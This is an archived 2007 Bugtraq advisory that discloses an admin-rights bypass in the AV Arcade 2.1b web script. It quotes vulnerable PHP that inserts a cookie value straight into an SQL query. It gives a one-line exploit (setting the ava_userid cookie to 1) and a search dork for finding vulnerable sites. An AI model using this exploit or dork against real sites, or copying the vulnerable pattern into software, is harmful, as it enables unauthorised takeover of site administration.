lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 2 Jul 2007 13:20:32 -0000
From: teh_lost_byte@...oo.com
To: bugtraq@...urityfocus.com
Subject: AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

Vurnerable code: admin/index.php:
   $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid']."");
   while($row = mysql_fetch_array($sql)){
   if ($row['admin'] == 1) {
   define( 'ADMIN_ACCESS', 1 );
   [...]

Exploit:

Set in your cookies: ava_userid = 1; and that`s all :p

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]
[EOF]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ